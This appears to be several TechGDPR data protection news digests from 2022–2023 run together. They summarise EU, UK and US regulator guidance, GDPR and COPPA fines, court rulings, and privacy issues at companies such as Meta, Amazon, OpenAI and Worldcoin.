‘Freedom of Information’ and data protection: Guernsey’s data protection commissioner discusses Freedom of Information requests that caused some of the most extraordinary data breaches recently, (eg, when details of thousands of police and civilian personnel employed by the Police Service of Northern Ireland were released in error). Freedom of Information generally refers to the right of citizens to access information held by public authorities. In reality, this information will often include personal data about individuals, whether that is staff, citizens or other individuals that the public authorities are in contact with. The rights of all individuals must be considered before any disclosure. If you are a data controller, you must understand your legal obligations concerning data subjects’ rights and have appropriate policies and procedures to ensure they are dealt with properly.

Biometric data: Meanwhile the UK Commissioner’s Office is currently consulting on draft guidance on biometric data. This guidance explains how data protection law applies to organisations that use or are considering using biometric recognition systems or vendors of these systems. At a glance:

• You must take a data protection by design approach when using biometric data.
• You should do a data protection impact assessment before you use a biometric recognition system. This is because using special category biometric data is likely to result in a high risk.
• Explicit consent is likely to be the only valid condition for processing available to you to process special category biometric data.
• If you can’t identify a valid condition, you must not use special category biometric data.

Employees’ digital monitoring rules: Digital work tools can record large amounts of data about employees, and therefore monitoring of it is heavily restricted, states the Norwegian privacy regulator. In most cases, the employer does not have the right to monitor the employee’s use of work tools, including the use of the Internet, unless the purpose of the monitoring is to manage the company’s computer network to uncover or clarify security breaches, etc. At the same time, it can be difficult for employers to introduce such measures in particular cases, as many regulations control different aspects of the working environment, and may include trade union approval, transparency obligations, data protection implications, and information security.

Privacy by default: This means that products and services are designed to ensure that a person’s privacy is protected from the outset and that they do not need to take any additional steps to protect their data, explains the Latvian data protection regulator. This approach is designed to minimise possible violations in the process of data acquisition and usage, and unauthorized access and risks that could arise if personal data comes into the possession of a third party. This may include minimal necessary data collection, default settings of the user account, (in “private mode”), limited data retention, (followed by automatic anonymisation or deletion of user data if the account is inactive for a certain period), user control tools, (whether to allow the user profile to be found in search engines, etc), clear information notices, (including all third parties with whom the data may be shared), and security measures, (encryption, regular security audits).

Enforcement decisions

UI Path data leak: The Romanian data protection authority has fined learning platform Uipath SRL approx. 70,000 euros for massive data loss. It did not implement adequate technical and organisational measures to ensure that, by default, personal data cannot be accessed, without the intervention of a person(s), including the ability to ensure the ongoing confidentiality and resilience of processing systems and services, as well as a process for regularly testing, assessing and evaluating the effectiveness of implemented measures. This fact led to the unauthorised disclosure and access to personal data, (user name and surname, the unique identifier, e-mail address, the name of the company where the user was employed, the country and details of the level of knowledge obtained within the courses), of about 600,000 users of the Academy Platform, for about 10 days. This violation is likely to bring physical, material or moral harm to the data subjects, such as the loss of control over their data or the loss of data confidentiality. 

Misconfigured cloud storage: The UK Information Commissioner issued a reprimand to a recruitment company: the organisation misconfigured a storage container, with 12,000 records relating to 3,000 workers, to be publicly accessible without any requirement to authenticate.  The personal data consisted of a variety of different data sets, including names, addresses, dates of birth, passports, ID documents and national insurance numbers. The company has since committed to periodically audit the configuration of cloud services as part of a wider security assessment including access rights, appropriate identity and access controls,  event logging and security monitoring. 

Vklass data leak: The Swedish privacy regulator has been reprimanding the learning platform Vklass for not being able to detect abnormal user behaviour in its learning platform and to track what happened in the system. Multiple complainants alleged that an unauthorized person came across personal data about teachers and students from the learning platform. The reports come from municipal committees and private businesses that conduct school and educational activities. The incident probably occurred because a student wrote a script that automatically saved information from the learning platform in its database and the information was then published openly on a website, which is now closed. 

Edmodo and minors’ consent: Meanwhile in the US, the Federal Trade Commission obtained an order against education technology provider Edmodo for collecting personal data from children without obtaining their parent’s consent and using that data for advertising, in violation of the Children’s Online Privacy Protection Act Rule, (COPPA), and for unlawfully outsourcing its COPPA compliance responsibilities to schools. Among many orders, the provider is obliged to identify the account in question and delete or destroy certain data, (from students under 13 years of age), periodically provide compliance reports to the Commission, permanently refrain from collecting more personal information than reasonably necessary for the child to participate in any activity offered on the online platform, etc.

Data security

High-risk systems: For some so-called “critical processing” IT systems, a data breach would create particularly high risks for people. As a result, they require an adequate level of security. To best support the professionals concerned, the French regulator CNIL submits a recommendation for public consultation, (in French). It specifically targets so-called “critical” treatments, defined by the following two cumulative criteria: a) the processing is large-scale within the meaning of the GDPR, and b) a personal data breach could have very significant consequences either for the data subjects, for state security or society as a whole. 

This includes customer databases and other processing that bring together a large part of the population, such as in the energy, transport, banking or large-scale dematerialised public services, health treatments, etc. Risk scenarios may include attacks by organised criminal organisations or “supply chain attacks”, likely to take place over a long period; the compromise of third-party service providers responsible for IT development, maintenance or support operations; the exploitation of unknown vulnerabilities of software or hardware components, the compromise of persons authorised to access the processing. 

Email security guidance: Guidance by the UK Information Commissioner explains what organisations should, and could do to comply with email security, including several case studies and a checklist. Even if email content doesn’t have anything sensitive in it, showing which people receive an email could disclose sensitive or confidential information about them. In brief: 

• You must assess what technical and organisational security measures are appropriate to protect personal information when sending bulk emails.
• You should train staff about security measures when sending bulk communications.
• You should include in your assessment consideration of whether using secure methods, such as bulk email services or mail merge services, is more appropriate, rather than just relying on a process that uses Blind Carbon Copy.
• If you are only sending an email to a small number of recipients, you could consider sending each one separately, rather than one bulk email. 

Big Tech

Open AI for organisations: Open AI offers its most powerful version of ChatGPT to enterprises. It has longer context windows for processing longer inputs, advanced data analysis capabilities, customization options and more. According to the company, 80 per cent of Fortune 500 companies, (largest US corporations), have registered ChatGPT accounts, as determined by accounts associated with corporate email domains. Businesses have expressed concerns about privacy and security, fearing that their data may be used to train ChatGPT and that the application could mistakenly reveal sensitive consumer information to AI models. According to OpenAI, ChatGPT Enterprise users will have complete rights and ownership over their data, which will not be used for algorithm training. 

‘Algorithmic disgorgement’: At the same time, the US Federal Trade Commission reminds companies of certain obligations when using Generative AI. When offering a generative AI product, companies need to inform customers whether and the extent to which AI training data includes copyrighted or otherwise protected material. Companies should not try to “fool people” into thinking that AI-generated works were created by humans. Companies must ensure that customers understand the material terms and conditions associated with digital products. The regulator also noted that unilaterally changing terms or undermining reasonable ownership expectations can be problematic, etc. Finally, in its enforcement of data protection regulations, the Commission has lately begun to compel “algorithmic disgorgement” – the destruction of not just the illegally obtained data itself, but also artificial intelligence models and algorithms constructed using such data.

The post Data protection digest 15 – 31 August 2023: financial data processing, misconducted learning platforms, and algorithmic disgorgement appeared first on TechGDPR.

Official guidance

Website analytics: There are many website analytics and tracking tools on the market notes the Norwegian data protection regulator, but that doesn’t necessarily mean it’s legal to use them on your website. Be prepared to follow the GDPR, even if you do not know the name or identity of those visiting your site. The analysis tools collect a lot of information, which either alone or in combination can constitute personal data. If you currently have an analysis tool that collects information that you do not use for anything, you are breaking the law:

• You must have a legal basis for processing. 
• There are many requirements for user consent to be valid. The mere existence of the cookie banner is not enough.
• Choose tools that promise to only process personal data on your behalf and as you decide. 
• On some websites, the visitors’ behaviour can in itself reveal special categories of personal data, (eg, mental health care).
• Many service providers have offices or subcontractors in countries outside the EU/EEA. You must check this before using the tool. 
• Make sure you provide honest and easily understandable information to the visitors, and respect their data subject rights.

Health care data aggregation: The French data protection regulator published recommendations for actors in the digital health sector, (in French). The sandbox projects included federated learning between several health data warehouses, a diagnostic aid solution in oncology, anonymous statistical indicators of populations in medical research, and a therapeutic game. The GDPR states that data processing in the field of health must be implemented in the public interest, and can only be mobilised by public entities, or legal entities entrusted with a public service mission. 

Thus, commercial projects, (start-ups), should be based on their legitimate interests. People’s consent in many cases was also ruled out as the companies are not in a position to collect it, particularly for the reuse of data from healthcare establishments. Finally, whenever non-anonymous data is exported, an ad hoc risk analysis must be performed to determine the necessary security measures. Continuity of security measures outside of the workplace should be ensured as much as possible. 

Customer location data: More retailers and companies are transferring their loyalty programs to mobile applications. These often demand access to the customer’s location-related data to personalise offers for each customer, taking into account their habits and other information. Regardless of the legal basis applied by the merchant for the data processing, (both consent and legitimate interest are possible), the customer has all the rights specified in the GDPR. Completely ceasing the loyalty program if the customer withdraws consent only to the processing of geolocation data will not comply with regulatory requirements. Therefore, when developing an application, it is necessary to take into account different possible levels of the loyalty program, granular consent, and withdrawal.

EdTech development: The French regulator also published a summary of the main recommendations, (in French), based on the “sandbox” project in the EdTech sector. That included actors developing a portfolio of learning skills, a communication solution in the school context, creating a warehouse of learning traces with a view to their publication and analysis and providing a “ personal cloud ” for students connected to their digital workspace. During the “sandbox” support, among other things, the technical architecture of solutions was analysed with the data controllers and their subcontractors. It has to be noted that:

• State establishments, (eg, primary schools), do not have a legal personality; teachers and directors are acting as agents of the administration of national education. 
• When onboarding a technical solution, the Ministry of national education must be considered as the only data controller, (in joint controllership with the municipality). 
• The company offering technical solutions would become a subcontractor. 
• For processing operations that pursue “school” purposes the legal basis of the ” mission of public interest ” has been considered the most appropriate to establish.
• Other treatments may demand individual, (eg, parental) consent. 
• Only authorised subcontractors and recipients of pupils’ data are allowed. 
• Information notices must be adapted to different age groups, and more generally to the degree of maturity of the pupils concerned. 

Legal processes and redress

Non-material damage under the GDPR: The Dublin District Court awarded 2000 euros compensation to a plaintiff regarding the use of CCTV footage of him by his employer, which led to victimisation from colleagues, serious embarrassment, and loss of sleep. As part of a meeting involving quality control and other managers and supervisors, CCTV video was displayed to various personnel. The plaintiff was not present at the meeting and found out afterwards that the tape had been utilised. The company’s data protection policies regarding CCTV were not clear or transparent, and no legitimate interest assessment about the remote control of the workers was carried out. Read more details of the case in the original analysis by the Irish lawyers. 

US state privacy legislation: The most recent comprehensive state consumer data privacy law has been passed in Oregon. The law has some unique provisions despite being similar to consumer data privacy laws passed in different states. It applies to nonprofit organisations, has broad definitions of covered data, (including categories of sensitive and biometric data, as well as derived data), a smaller HIPAA, (protected health information), carveout, and grants Oregon residents the right to request a list of the third parties to whom controllers disclosed their data, opt-out options and more. Meanwhile, the Colorado Privacy Act has been enforceable since 1 July, making Colorado the third state after California and Virginia to pass a comprehensive privacy law to protect its residents.

COPPA 2.0: Amendments to the Children’s Online Privacy Protection Act, (and the Kids Online Safety Act), have been approved by a Senate Committee. It would close a loophole allowing companies to abuse minors’ data with little accountability, making it harder for the regulator to prove violations. It would be unlawful for a digital service or connected devices directed at children or teens, to collect, use, disclose to third parties, or compile their data for profiling and targeted marketing unless the operator has obtained consent from the relevant minor, (“verified parental consent”). The operators must also treat each user as a child or minor unless content is deemed to be directed to mixed audiences.

Enforcement decisions

Security measures: Open Bank was fined 2.5 million euros by Spain’s data protection regulator for failing to implement a framework to permit encrypted communication. In order to comply with anti-money laundering legislation, the complainant was asked to confirm the origin of funds received in their bank account. However, the only possibility was to provide the information by email, (rather than through a secure direct channel). The information requested by Open Bank is classified as ‘financial data,’ which requires the implementation of strengthened safeguards. The regulator decided that Open Bank did not implement a data protection strategy from the start, neither before nor during treatment.

In another recent example, the Polish regulator punished a firm to the tune of almost 9000 euros for losing employees and contractors’ personal data in a ransomware attack. The organisation failed to complete a risk assessment, notify the regulator of the breach within 72 hours of becoming aware of it, and notify the data subjects affected by the breach. The regulator also claimed that the company did not comply fully throughout its inquiry. In particular, the company’s communication was frequently inconsistent.

Non-registration with the regulator: Guernsey’s data protection authority is to pursue legal action for failure to register. It is a legal requirement for any organisation, (including sole traders) that handle people’s personal information during the course of their business activities – even if this is just names and addresses – to register with the Guernsey regulator.  If you are not sure if you need to register, there are three clear criteria:

• You, (whether a sole trader, organisation, business, charity, landlord, business association etc.), are established in the Bailiwick of Guernsey.
• You are working with personal data, (any information that may identify individual people, such as staff members, your clients, your business contacts, your service users, your tenants etc.), either as a ‘controller’ or a ‘processor’.
• The activity you are performing is not part of your personal/household affairs.

Non-cooperation with the regulator:  According to Data Guidance, the Polish data protection authority fined a company 8000 euros for failing to cooperate, (Art. 58 of the GDPR). The regulator received a complaint alleging that the firm had improperly shared personal information with a third party. The regulator sent the business several letters demanding further information, including the legal basis and purpose of processing. The organisation, however, did not react to any of the letters. 

Reimbursement app: A one million euro fine was imposed by the Italian privacy regulator on Autostrade per l’Italia (ASPI) for having illegally processed the data of around 100,000 registered users of the toll reimbursement app, called Free to X. The critical issues of the service – which allows the total or partial refund of the cost of the motorway ticket for delays due to construction sites – had been reported by a consumer association. The authority has ascertained that Autostrade plays the role of data controller and not of data processor, as erroneously indicated in the documentation that governs the relationship between Aspi and the company Free to X which created and manages the app.

Meta behavioural ads:  The Norwegian data protection authority has prohibited Meta from adapting advertising based on monitoring and profiling of users in Norway. The decision comes shortly after the CJEU stated that Meta’s data practices still do not take place legally. When Meta decides which ads you get to see, they also decide which content you don’t get to see. This affects freedom of expression and information in society. There is a danger that behaviour-based marketing reinforces existing stereotypes or that it can lead to unfair discrimination between different groups. Behaviour-based targeting of political advertisements is particularly problematic.

Medical data anonymisation for research: The Italian regulator fined a company for processing the health data of numerous patients collected from around 7000 general practitioners without adopting suitable anonymisation techniques. The GPs adhering to the international health research initiative had to add to their management system “Medico 2000” a function, (“data extractor” add-on), aimed at automatically anonymising patient data and transmitting them to the above company. But in fact, the tool only pseudonymised data assigned to the patients. There was also the erroneous attribution of the role of the data controller to GPs, and therefore the absence of a legal basis for data processing by the company. 

Data security

Videoconferencing tool: The EDPS has found that the use of Cisco Webex videoconferencing and related services by the CJEU meets the data protection standards under Regulation 2018/1725 applicable to EU institutions, bodies, offices and agencies. However, the decision is not a general endorsement nor certification of data protection compliance of the videoconferencing services provided by any Cisco Webex entity.  

With regard to technical safeguards, the court confirmed that support information is encrypted in transit, while case attachments are encrypted both in transit and at rest, in order to secure personal data from accidental loss and unauthorised access, use, alteration, and disclosure. The keys for encryption are managed by Cisco. 

The court also took organisational measures to limit or avoid transfers of personal data outside of the EU/EEA: in case Cisco needs to have remote access to the court’s Cisco Webex infrastructure, the DPO of the court, in collaboration with the court network engineers, shall analyse the possible risks for the data subjects and decide on the legitimacy of this access.

Ryanair facial recognition: Privacy advocacy group NOYB filed a complaint against Ryanair, alleging that the airline is violating customers’ data protection rights by using facial recognition to verify their identity when booking through online travel agents. The airline outsources this process to an external company named GetID. This means that customers have to entrust, (by consenting to it), their biometric data to a company they have never heard of or had a contract with. Passengers can avoid it by showing up at the airport at least 2 hours before departure or submitting a form and picture of their passport or national ID card in advance. 

Big Tech

Alexa child accounts and geolocation: The US Federal Trade Commission will require Amazon to overhaul its deletion practices and implement stringent privacy safeguards to settle charges the company violated the Children’s Online Privacy Protection Act and deceived parents and users of the Alexa voice assistant service about its data practices. Amazon claimed it retained children’s voice recordings in order to help it respond to voice commands, allow parents to review them, and improve Alexa’s speech recognition algorithm. 

Among many requirements, Amazon will have to implement a process to identify inactive Alexa child profiles. Following the identification of any inactive child profile, the company shall delete any personal information, (voice recordings and geolocation information), within 90 days, unless the parent requests that such information be retained. Misrepresenting the privacy policies related to geolocation and children’s voice information will also be prohibited.

Amazon Go shops: A recent class action against Amazon in New York over its cashier-less Amazon Go shops was voluntarily terminated for unspecified reasons. Previously, the complaint claimed that Amazon acquired biometric data from customers in violation of a New York City Biometric Identifier Information Statute. According to the complainant, Amazon scanned customers’ hands and illegally uses technologies such as computer vision, deep learning algorithms, and sensor fusion to measure customers’ bodies to identify and monitor where they walked in the shop and what they purchased. The lawsuit demanded 500 dollars for each infraction of the legislation.

Worldcoin biometric verifications: Members of the public in selected locations worldwide are being encouraged to have their eyes scanned as part of a cryptocurrency initiative that tries to identify humans from AI systems via biometric verification. The Worldcoin protocol operates by providing biometrically verified individuals with a digital identity in the form of a Worldcoin token, which promises to be the first crypto token to be issued globally and freely to people simply for being genuine individuals. Users will also receive access to the app, which will allow them to make global payments, purchases, and transfers utilizing digital and traditional currencies. The UK Information Commissioner’s Office commented on the situation: 

• The organisation must conduct a data protection impact assessment before starting any processing that is likely to result in high risks, such as processing special category biometric data. 
• Where they identify high risks that they cannot mitigate, they must consult the regulator.
• The organisation also needs to have a clear lawful basis to process personal data. Where they are relying on consent, this needs to be freely given and capable of being withdrawn without detriment.

The post Data protection digest 17 – 30 July 2023: guide on website analytics, health care data sharing, and COPPA 2.0 appeared first on TechGDPR.

Legal processes and redress: US signals intelligence redress mechanism, Google search results removal, California consumer privacy rights, Australia Privacy Act review

The US Office of the Director of National Intelligence, (ODNI), published a directive for implementing the signals intelligence redress mechanism created under the proposed EU-US Data Privacy Framework. It is necessary for the implementation of the US adequacy decision which received a green light from the European Commission just before the end of 2022. The directive governs the handling of redress complaints regarding certain signals intelligence activities and outlines the process by which qualifying complaints may be transmitted by an appropriate public authority in a qualifying state. Additionally, the directive outlines the role of the ODNI Civil Liberties Protection Officer with a given complaint: 

• investigate, review, and, as necessary, order appropriate remediation for a covered violation regarding qualifying complaints; 
• communicate the conclusion of such investigation to the complainant through the appropriate public authority; and
• provide the necessary support to the US Data Protection Review Court.

In Sweden, the Supreme administrative court rejected the appeal in a case between Google and the Swedish privacy regulator IMY. This means that the judgment gains legal force and that Google must pay a 4.5 million euro fine. In 2020, the IMY charged Google for violating the right to have search results removed. When Google delisted search results the site owner was notified of the webpage and data subject concerned via Search Console, previously Webmaster Tools. But informing the site owner meant that the personal data was used beyond its original purpose, and the information notice was misleading users and restraining them from exercising their right to request removal. 

California consumer privacy rights expanded on 1 January, (but will be enforced in July).  In 2020, California voters approved Proposition 24, known as CPRA, amending some of the older CCPA’s consumer protections and therefore expanding business’ obligations. For example, previously employees, job applicants, owners, directors, officers, and contractors were excluded from the definition of “consumer,” and they had limited data subject access rights. These rights include the ability to opt-out of profiling, opt-out of targeted/cross-context advertising, opt-out of automated decision making, and to limit the use and disclosure of sensitive information. The new law establishes annual privacy risk assessments and cybersecurity audits. Civil lawsuits will also be allowed against companies that fail to take appropriate measures, with potential damages between 100 and 750 dollars per consumer, per incident. 

Australian Attorney-General Mark Dreyfus confirmed that the Privacy Act Review has been completed and a final report received by his department. The announcement came shortly after a wave of spectacular data breaches in the Australian corporate sector. The new privacy regime could include a broader definition of personal data, expanded information obligations for organisations, opt-in consent for users, the right to erasure, and increased penalties for serious or repeated data breaches. 

Official guidance: special categories of data, global cookie review, data brokerage, age-appropriate design tests

The Latvia data protection agency DVI issued a reminder of the rules for the legal processing of special categories of personal data. For special categories of personal data, in order to ensure their legal processing, in addition to complying with the general data protection conditions, it is necessary to observe that by default they are prohibited from processing unless there are exceptional permissions or justifications:

• a person’s consent, (eg, to receive commercial notices about price discounts for specific goods or services in a pharmacy);
• social protection rights, (eg, when terminating the employment of a unionised employee, the employer must contact the trade union); 
• vital interests of a person, (eg, in cases where a person is unconscious and it is necessary to find out his blood group, allergies, etc.);
• non-profit activity for political, philosophical, religious, or trade union-related purposes, (the personal data is not disclosed outside the said organisation without the consent of the individual);
• data deliberately made public, (eg, the person has expressed on social networks that they are vegetarian);
• essential public interests, (eg, information about political party donors must be made public);
• preventive or occupational medicine, ( eg, assessment of the employee’s work capacity, health or social care, or treatment);
• public health, (eg, to limit the spread of COVID-19);
• archiving in the public interest, for scientific, historical or statistical purposes.

The French privacy regulator CNIL published guidelines on the commercial use of customer files – data brokerage. Data controllers need to pay attention to the types of data that can be transferred, (only data relating to active customers can be shared), and on obtaining consent from data subjects for the intended transfer, (eg, via an electronic form). The purchaser also must inform the data subjects of the transfer and the source of the data, (the name of the company that sold the customer files,) and obtain the data subjects’ consent if it wishes to use their data for electronic commercial prospecting.

Bird&Bird offers the latest Global Cookie Review – the legal and regulatory landscape relating to the expanding use of cookies and similar technologies, country by country. Such regulations often follow a path set by the EU GDPR and ePrivacy Directive. The report also contains Asia Pacific, Latin American, and South African overviews, where similar regulations are often lacking or can be even divergent on transparency and consent requirements. 

The UK Information Commissioner’s Office has published design tests to support designers of products or services that are likely to be accessed by children or young people. Each test provides a report detailing areas of good practice as well as ways to improve conformity with the Age-Appropriate Design Code. This includes “best interests of the child” standards like age authentication, safe default settings, parental controls, enforcement, and data protection impact assessments.

Investigations and enforcement actions: credit rating by mistake, “dormant” risk assessment, “defaulting” customers error, employees’ email metadata, mass grocery purchases monitoring, and workers’ fingerprinting

The Norwegian data protection authority has notified Recover of its decision to fine the company 20,000 euros. The matter concerns a credit rating performed without a legal basis. The background to the fine is a complaint from a private individual who was subjected to a credit assessment without any form of customer relationship or other connection to the above company. A credit rating is established after compiling personal data from many different sources including a person’s overall financial situation, any payment remarks, debt-to-income ratio, and whether the person has any mortgages/liens.

The Norwegian regulator also has given Statistics Norway notice of a decision that involves a ban on their planned collection of data on the Norwegian population’s grocery purchases. Through the collection of bank data and bank transaction data, the organisation planned to obtain information on what the population buys, and then link that to socio-economic data such as household type, income, and education level. The regulator believes that a legal basis, (societal benefit of consumption and diet statistics), is not clear and predictable enough for this planned processing of personal data. Even if the purpose is to produce anonymous statistics, intrusion into the individual’s privacy will occur. 

Italian regulator Garante fined Areti 1 million euros: thousands of users were mistakenly classified as “defaulting” customers and unable to switch to other suppliers. The misalignment of the company’s internal systems led to incorrect data migration to the integrated information database consulted by suppliers before signing a new contract. As a result, more than 47,000 Areti customers wanting to change energy supplier were denied an account activation and any potential savings deriving from market advantages, because they were incorrectly red-flagged. 

Additionally, Garante issued a fine to Lazio Regio of 100,000 euros for unlawful monitoring of employees’ email metadata. An internal audit was launched by the region on the suspicion of a possible unauthorised disclosure to third parties of information protected by official secrecy. Metadata was collected in advance and stored for 180 days: date, time, sender, recipient, subject, and size of email. This allowed the region to obtain information relating to employees’ private lives, such as their opinions or contacts. 

No workplace fingerprinting without specific requirements is the ruling from Garante, which fined a sports club 20,000 euros. The authority intervened following a report from a trade union, which complained about the introduction of the biometric system by the company, despite the union’s request to adopt less invasive means of authentication. The company had carried out, for almost four years, the fingerprinting of 132 employees, violating the principles of minimisation and proportionality. It also provided workers with very little information on the characteristics of biometric treatments. 

The Romanian data protection authority completed an investigation at leading retailer Kaufland and issued a fine of 3000 euros. A video recording containing images of a complainant in the parking lot of one of the stores by the commercial chain appeared on the web page of a local newspaper. It turned out that the store manager allowed an employee access to the monitoring room, who captured, with his personal mobile phone, images of the video recordings that were playing and sent them via WhatsApp to a third party. Later, the images were transmitted by posting them by an online publication. As a result, the image and registration number of the car were revealed, with two persons affected by this incident.

The EDPB published a summary on risk assessment and acting in accordance with established procedures. A controller, (in Poland), was notified of a personal data breach that occurred as a result of a break-in at an employee’s apartment and the theft of a laptop. The confidentiality of the personal data was at risk because the stolen computer was only password protected. The controller had kept adequate documentation since the beginning of the application of the GDPR and had performed a risk assessment, but it was only after the data breach occurred that the controller complied with the results of its own risk assessment by encrypting laptop hard drives.

Data security:  zero trust architecture, IoT onboarding, and lifecycle management

The US NIST’s National Cybersecurity Center of Excellence has published a draft practice guide on implementing a zero trust architecture and is seeking the public’s comments on its contents. As an enterprise’s data and resources have become distributed across the on-premises environment and multiple clouds, protecting them has become increasingly challenging. Many users need access from anywhere, at any time, from any device on-premises and in the cloud. Comments from industry participants are welcomed by or before 6 February. 

In parallel, the NIST is also seeking comments on draft guidance on Trusted IoT Onboarding and Lifecycle Management. Scalable mechanisms are needed to safely manage IoT devices throughout their lifecycles, beginning with secure ways to provision devices with their network credentials—a process known as trusted network-layer onboarding. In combination with additional device security capabilities such as device attestation, application-layer onboarding, secure lifecycle management, and device intent enforcement, this could improve the security of networks and IoT devices from unauthorised connections.

Big Tech: face recognition practices by PimEyes, Epic games’ COPPA violations, TikTok apps age rating

The Baden-Württemberg data protection authority announced proceedings against PimEyes, (Face recognition and reverse image search), Data Guidance reports. Recent media reports stated that PimEyes scans the face for individual characteristics on the internet and stores biometric data without proper legal basis, an identified data sharing model, or valid opt-out options. A data subject should be able to agree to the processing of personal data relating to them in an informed and unambiguous manner. In the case of automated retrieval of images on the Internet, these requirements cannot be met. Equally, private company PimEyes cannot undertake police investigative work in the public interest or interfere with the rights of data subjects. Read the original statement here. 

US Video Game Maker Epic will pay a more than half-billion dollar refund over allegations of children’s privacy law, (COPPA), violations, and tricking users into making unwanted charges for in-game items, (eg, costumes and dance moves). Epic’s Fortnite game has more than 400 million users worldwide. The company will be required to adopt strong privacy default settings for children and teens, (parental notice and consent requirements), ensuring that voice and text communications are turned off by default. This is the Federal Trade Commission’s largest refund award in a gaming case and the largest administrative order in its history. 

Finally, Virginia Attorney General joined 14 other state attorneys general to call on Apple and Google to take immediate action and correct their application store age ratings for TikTok. The change will help parents protect their children from being force-fed harmful content online. The current ratings of “T” for “Teen” in the Google Play App store and “12+” in Apple’s App Store falsely represent the objectionable content found and served to children on TikTok. While TikTok does have a “restricted mode” available, it is also aware that many of its users are under 13 and have lied about their age to create a profile.

The post Data protection & privacy digest 16 Dec – 2 Jan 2023: US signals intelligence redress mechanism, “dormant” privacy risk assessment, data brokerage appeared first on TechGDPR.

Legal processes: UK new data protection draft bill, rules to prevent child abuse online

A UK new data protection draft bill was published on a parliamentary website. This document is intended to update and simplify the UK’s data protection framework to reduce organisational burdens while maintaining high data protection standards. The bill was introduced to the House of Commons and given its first reading on 18 July. This stage is formal and takes place without any debate. MPs will next consider it at the second reading on 5 September. The main provisions of the bill include:

• greater flexibility on how to comply with certain aspects of the data protection legislation (eg, relying on legitimate interest or amending the requirement for controllers to keep logs relating to processing);
• improving the clarity of the framework, particularly for research organisations;
• more certainty and stability for cross-border flows of personal data;
• changes to the Privacy and Electronic Communications Regulations 2003, relating to the confidentiality of terminal equipment, (eg, cookie rules), unsolicited direct marketing communications, (eg, nuisance calls), and communications security (eg, network traffic and location data);
• a framework for providing digital verification services in the UK to secure those services’ reliability and enable digital identities to be used with the same confidence as paper documents;
• a wider application of provisions on information standards extending to persons including providers of IT, IT services or information processing services used, or intended for use, in connection with the provision of health or the adult social care sector in England;
• smart data schemes to allow for the secure sharing of customer data, (eg, held by a communications provider or financial services provider), upon the customer’s request, with authorised third-party providers;
• use of personal data for law enforcement and national security purposes.

Meanwhile, the Irish government has approved the expansion of the Data Protection Commission, (DPC). The intention is to appoint two additional commissioners to support the evolving organisational structure, governance and business needs of the DPC. The appointments are to be made following the Data Protection Act 2018, which allows up to three commissioners to be appointed. The commission and its stakeholders, like the Irish Council for Civil Liberties, have regularly highlighted the increased working burden and investigative complexity. Ireland is a notable one-stop shop for the Big Tech companies headquartered in the EU. The DPC’s GDPR enforcement capacity, especially its cross-border aspects, has also been a point of debate in recent years across Europe. 

The EDPB and EDPS have adopted a joint position on the proposal for a regulation of the European Parliament and of the Council laying down rules to prevent and combat child sexual abuse. The proposal lacks clarity on critical elements, such as the notions of “significant risk”. Furthermore, the entities in charge of applying those safeguards, starting with private operators and ending with administrative and/or judicial authorities, enjoy a very broad margin of appreciation, which leads to legal uncertainty on how to balance the rights at stake in each case. The EDPB and EDPS also believe scanning audio communications is particularly intrusive and must remain outside the scope of the obligations in the proposed regulation, both concerning voice messages and live communications. The regulators express doubts regarding the efficiency of blocking measures and consider that requiring providers of internet services to decrypt online communications to block those concerning CSAM would be disproportionate.

Official guidance: UK BCRs, use of biometric data, age verification online

The UK Information Commissioner’s Office, (ICO), has released updated guidance on GDPR-governed Binding Corporate Rules, (BCRs), application forms, and tables for data controllers and processors. The concept of BCRs to provide adequate safeguards for making restricted transfers was developed under EU law and continues to be part of UK law under the UK GDPR, (specifically, Art. 47). BCRs are intended for use by multinational corporate groups, groups of undertakings or enterprises engaged in a joint economic activity such as franchises, joint ventures or professional partnerships. The guidance is intended to assist controllers when preparing the UK BCR pack for approval: the application form, the binding instrument, and any supporting documents. EU and UK BCRs requirements in both jurisdictions currently overlap. Therefore, the ICO has simplified the UK BCR approval process for applicants.

The Spanish privacy regulator AEPD published a blog post, (in Spanish), on the use of biometric data from a data protection perspective. Biometric data processing techniques are based on collecting and processing people’s physical, behavioral, physiological, or neural traits through devices or sensors, creating signatures or patterns that enable the identification, monitoring, or profiling of people. Some methods require the cooperation of the individual. In contrast, other methods can capture biometric data remotely, without requiring the cooperation of the individual and without the individual being aware of it. When demonstrating the adequacy of treatment to the GDPR, it is convenient to use classification criteria of biometric operations: 

• purpose of operations with biometric data concerning the purpose of the treatment, 
• legal framework,
• scope of treatment,
• qualified human intervention,
• transparency,
• free choice of the data subject,
• adequacy, sustainability and necessity,
• minimum data,
• degree of user control,
• Implicit collateral effects in the biometric operation, (eg, proctoring), etc.

How to perform age control on a website? The French CNIL offers some effective and privacy-friendly solutions. After analyzing existing systems, the French privacy regulator recommends developing new solutions. The age control to protect young people is compatible with the  GDPR, provided that sufficient guarantees are presented to minimize privacy breaches and prevent age control from being an opportunity for publishers to retrieve additional data on Internet users visiting their site. In addition, it is necessary to avoid the data being captured by a third party for malicious uses, (biometric data breach, phishing, spoofing, blackmail). 

It is possible to verify age by using an automatic system’s credit card, facial analysis of facial features. However, these solutions must be operated by third parties with sufficient security and reliability to avoid data theft and ensure that the additional risks generated by their use are considered. Another solution is possible, says the CNIL, but presents specific technical difficulties or a lower maturity. In this case, a trusted third party is provided with reliable proof of age by an administration or a company that knows the Internet user and can certify his age. This proof would then be transmitted by the trusted site or by the user himself to the site to which the user requests access. The system recommended by the CNIL would provide triple protection of privacy:

• the person providing proof of age knows the identity of the user, but does not know which site is being visited;
• the person who transmits the proof of age to the site may know the site or service consulted, but does not know the identity of the user;
• the site or service subject to age verification knows that the user is of legal age and that a person is consulting it, but does not know their identity.

Investigations and enforcement actions: vehicle rental, progressive health research, wrongful patient referral, passwords in plain text, cookie violations

The supervisory authorities, (SAs), of the Baltic States launched coordinated preventive supervision on the compliance of personal data processing in the field of short-term vehicle rentals, the EDPB reports. The SAs have agreed that supervision will be carried out on enterprises whose main recipients of services are natural persons (eg, electric scooters). Primarily, merchants whose principal place of business is located in one of the Baltic States and who offer their services throughout the Baltics will be monitored. Concerning its decision-making, each SA may extend the scope of the supervision to the activities of enterprises that are also active in only one Member State.

The EDPB has published a selection of cases of strategic importance where there is a likely high risk to the rights and freedoms of natural persons. The degree of public debate and media attention is not included as a separate criteria, but the data protection authorities can take these factors into account. A proposal may be made if it concerns:

• a structural or recurring problem in several Member States;
• a case related to the intersection of data protection with other legal fields;
• a case that affects a large number of data subjects in several Member States;
• a large number of complaints in several Member States; 
• a fundamental issue falling within the scope of the EDPB strategy;
